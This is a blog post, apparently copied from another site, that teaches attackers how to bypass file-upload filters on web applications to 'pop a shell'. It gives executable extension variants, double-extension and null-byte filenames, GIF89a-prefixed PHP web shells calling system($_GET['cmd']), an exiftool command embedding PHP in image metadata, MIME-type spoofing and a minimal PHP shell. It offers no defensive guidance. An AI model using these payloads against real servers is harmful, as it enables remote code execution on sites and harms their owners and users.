Bypass File Upload Restrictions on Web Apps to Pop a Shell

Some dynamic websites allow it’s users to upload files, images, songs, movies, or anything specific. Such as Facebook and Linkedin allow ...

Some dynamic websites allow it’s users to upload files, images, songs, movies, or anything specific. Such as Facebook and Linkedin allow their users to upload profile pictures and resume. File uploading is crucial for many web applications and at the same time, its a big risk if proper security controls are not implemented on file uploads.

Because there are various techniques for hackers to bypass and beat file upload restrictions to pop a shell.

Introduction
Today, we’ll discuss how a hacker can make use of unrestricted file upload vulnerability to compromise websites and servers.
Before getting started! It is important to know the basic details about web shells and file upload vulnerabilities. Attackers use web shells for various operations such as executing shell commands, deleting files, creating files, downloading files, etc.
Often times it is possible just to upload a reverse shell without bypassing filters and restrictions.

Bypassing Blacklists

In blacklisting certain types of extensions are explicitly prohibited from being uploaded to the server. This might seems like an optimal solution to protect your server from getting infected, but it is possible to bypass certain conditions.
File Extensions
Developers my blacklist certain file extensions and prevent users from uploading those files that are considered dangerous for the server. But this can be bypass by changing some strings in extensions to upload and execute payload or web shell.
TypeExtensions
PHP.pht, phtml, .php, .php3, .php4, .php5, .php6, .inc
JSP.jsp, .jspx, .jsw, .jsv, and .jspf
Perl.pl, .pm, .cgi, .lib
Aspasp, .aspx
Coldfusion.cfm, cfml, .cfc, .dbm
In some cases changing extensions might not do the trick instead you have to do like,
.pHp, .Php, .phP

Bypassing Whitelists

In whitelisting, where the server only accepts only specific extensions. For example, a website where you have to upload a profile picture that might take JPG, JPEG, or PNG files.
Apache allows files to be uploaded with double extensions. That means we can trick the server into accepting a shell that also has a PNG extension in the end.
shell.php.png
shell.php%00.png
shell.php\x00.jpg
Another way to bypass whitelisting is to manipulating file type headers.
If a certain website accepts images that will also accept GIF images. We can add GIF89a to trick the server into uploading shell.
GIF89a; <?php system($_GET['cmd']); ?>

GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>

EXIF Data

This method allows us to bypass file upload restrictions by utilizing EXIF data in an image. Inserting a comment that contains PHP code will be executed by the server when an image is processed.
You can do this with gimp or ExifTool
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.png
mv image.jpg image.php.png

MIME-type

Blacklisting MIME types is also a method of file upload validation. It may be bypassed by intercepting the POST request on the way to the server and modifying the MIME type.
Normal PHP MIME type:
Content-type: application/x-php

Replace with
Content-type: image/jpeg

Other Bypassing Methods

In some situations, the length of content can also cause trouble to validate uploaded files. For that, PHP shell command can be shortened like this,
<?='$_GET[x]'?><br>

Copy-Paste From: https://thehacktoday.com/

COMMENTS

Name

2008,1,2012,1,2013,1,2018,1,2020,1,AC DC Power Jack / DC Port,12,Acer,1,Adaptor/Charger,10,Android,2,Asus,1,Blogspot,6,Chembook,1,ChipLevel,1,Chrome,2,CMD,2,Dell,4,Django,1,Free Fire,1,FRP Bypass,4,Game,1,Gmail,3,Google,3,Hackeraj,18,Hindi Dubbed,3,Hindi Movie,4,HP,2,HTML,2,Kali Linux,1,Keyboard,15,Linux,1,Medion,1,Metasploit,1,Mobile Repairing,3,Movie,7,NEC,1,Packard Bell EasyNote,1,PC,2,Product,38,Rishi Kapoor,1,Samsung,1,Speaker,1,Tiger Shroff,1,Toshiba,1,TV Channel,4,Website Hacking,1,Wifi,1,Windows,1,
ltr
item
Hackeraj: Bypass File Upload Restrictions on Web Apps to Pop a Shell
Bypass File Upload Restrictions on Web Apps to Pop a Shell
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0-snJ2u279ZpPzYl7yjpHbj2eGtQZyI30WW7_-1nWTVQz0fL8DokUglypjSGg-mjU4fzC3_5ML00ogVFmhcIYoJSMQmiGpcxkBKxDiqgtEWiGmkHRiX9NYudX6W_gQrRZyT6-N7lCIww/s320/600px-Hackeraj.png
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0-snJ2u279ZpPzYl7yjpHbj2eGtQZyI30WW7_-1nWTVQz0fL8DokUglypjSGg-mjU4fzC3_5ML00ogVFmhcIYoJSMQmiGpcxkBKxDiqgtEWiGmkHRiX9NYudX6W_gQrRZyT6-N7lCIww/s72-c/600px-Hackeraj.png
Hackeraj
http://hackeraj.raaz.info.np/2020/08/bypass-file-upload-restrictions-on-web.html
http://hackeraj.raaz.info.np/
http://hackeraj.raaz.info.np/
http://hackeraj.raaz.info.np/2020/08/bypass-file-upload-restrictions-on-web.html
true
4576236898731780867
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy